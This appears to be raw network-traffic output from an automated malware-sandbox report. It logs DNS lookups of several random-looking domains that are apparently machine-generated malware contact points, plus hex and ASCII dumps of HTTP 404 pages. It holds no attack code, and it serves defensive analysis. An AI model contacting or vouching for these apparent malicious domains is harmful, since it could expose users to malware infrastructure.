Source: global trafficDNS traffic detected: DNS query: gatydaw.com
Source: global trafficDNS traffic detected: DNS query: qetyxiq.com
Source: global trafficDNS traffic detected: DNS query: qegynuv.com
Source: global trafficDNS traffic detected: DNS query: lyvylyn.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:52:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T47TxWVx2O1M5cbssqArJpdhX7PwAwX6T2MVHPd6OO2G0G3sc9VfxLvf7i%2Bpttk5GXvDg%2BUPRmAUWVFCIp2TfkTiR%2BS%2Bj%2BSV8V44H42ml2Mp%2FnHmKOz5uk%2FuT%2FGWUA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb40c9d2c8c3c-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:52:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B5uCX5xsqR1nBqM0Ng1KwQUjFByFqE2uKX%2BU7ovCRO50o3vth3IOc85p0nYztAHWSyWyocDzTAidxjdEHXrDknyCjDq6WTYS1wN1ztUSvqTTuXTXYo%2FLcM%2FaGKuIPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb41b8afd4373-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:53:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="45.6",amp_style_sanitizer;dur="23.2",amp_tag_and_attribute_sanitizer;dur="13.2",amp_optimizer;dur="7.5"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P0BSGN8ltweW1QkLmDeiDFh3RZtcLJndyFskVj6NxKLedPRbrU0Y2MxHydwSdQ7QhCMYrd02CmTqqaAiec0KTCtRUmoDgZwjnH459s5VAs7D7b2KwlHadWzLkfq8Vw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb51afbd63338-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:53:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="47.8",amp_style_sanitizer;dur="22.5",amp_tag_and_attribute_sanitizer;dur="21.3",amp_optimizer;dur="4.2"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUXgMjfBq6S2attjTSB7E3iwucP5Hrp9kcsDsELpFuYefC%2BhQmkzn1i7Unw8GjZfPvVqd%2BfvkjYGJYaNnPG3rJYDmRUXZ%2Bz%2BOnwiHwVTmJpIW%2Bct8EhO9gS8DhPx5Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb5284f776a57-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:53:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1Tqm34XKyKNkTfHmQXQgrCQLSo9xhcLIhpY4fHRotCBwUO182%2B95GoYFaR6UlGI2z1O6fq8qUNkkUDvfq1PMBf5kNwce5q%2F9UTXqAWlIcaG4mjruW%2BTduDzdBVatA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb5f73a864376-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:53:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6yxmMiz0GykYnaZPBg3WIoUaAnjjJuMALy1zU5jybloHK0GPi17pSpNIgLmEUWoXVYDC30Z06LEXJNeIC730O98m4tjita1Cm4KdKlYO72txqG%2F4rqXZpcMckmtktA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb6060f4a1895-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:54:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="41.7",amp_style_sanitizer;dur="21.8",amp_tag_and_attribute_sanitizer;dur="16.6",amp_optimizer;dur="4.8"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uerRVSqKt9lueXUYBU1HDW%2F7kPvuN196fpS15TKckOB7Cvm6G1a7GPXqG%2BvykSHqiP6vN1i8ivaCpi29YXa4hfAEx2JRsvh1xIB4zkXPq5EXeDBH508UYot9dCDdA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb6447bf543df-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:54:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="41.6",amp_style_sanitizer;dur="20.5",amp_tag_and_attribute_sanitizer;dur="18.5",amp_optimizer;dur="4.0"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jIX8x1dmnG5It6Kp6CiEM0LW%2BKc50WoLptehkIP0i06IHQ7yHjWWtnpyYF0OvrljK7OVBD7fC0HSM97fQzsp4cnEDx%2BbZf%2Fjc4aU%2Fkq%2B3fseHaoX5y%2FWYbiaJOAkhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb64e384a42f5-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 08:52:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 08:52:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 08:52:35 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 08:52:36 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Sun, 08 Sep 2024 08:53:26 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Sun, 08 Sep 2024 08:53:27 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 08:53:28 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
